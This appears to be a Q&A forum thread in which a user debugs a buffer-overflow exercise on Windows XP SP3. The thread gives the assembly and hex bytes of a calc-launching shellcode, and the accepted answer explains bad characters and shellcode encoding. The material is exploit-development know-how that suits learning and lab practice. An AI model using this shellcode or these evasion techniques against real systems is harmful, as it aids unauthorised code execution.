# Unintended change in shellcode

Tags: security, buffer-overflow

I am trying to perform a simple buffer overflow on a xp sp3, but I face an issue.

**This is the assembly of the shellcode (calc):**

```
xor ecx, ecx

push ecx

push 636c6163

push 1

mov edx, esp

add edx,4

push edx

mov eax,  kernel32.WinExec

call eax
```

**This is the shellcode:**

```
\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xad\x23\x86\x7c\xFF\xD0
```

**This is how it looks like on the stack:**

```
0012FF58   41414141  AAAA

0012FF5C   41414141  AAAA

0012FF60   41414141  AAAA

0012FF64   77F31D2F  /ów  GDI32.77F31D2F

0012FF68   90909090  

0012FF6C   6851C931  1ÉQh

0012FF70   636C6163  calc

0012FF74   23ADB854  T¸­#

0012FF78   **D03F**7C86  †|?Đ
```

The problem is that when the shellcode is copied on the stack (or even into the memory before copied on the stack) is changed. From FF D0 become 3F D0, and because of that, the shellcode does not run. If I manually write back the F3 to FF and continue the running of the program in Immunity the calc opens. Otherwise, it fails. Furthermore running outside the Immunity the calc opens but access violation also occurs at the same address as in Immunity.

Do you know maybe why the value of FF is changed to F3?

Thank you!
Erik

Comment: did you check my answer?

Answer (score 0, accepted):

There are some common bad characters not to use in the shellcode, for example:

```
00 (NULL)
FF (\f)
0D (\r)
0A (\n)
```

In that case you can:
- edit the instruction that contain these bad character in order to change the opcode
- encode your shellcode

With immunity for example you can use [mona.py](http://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/)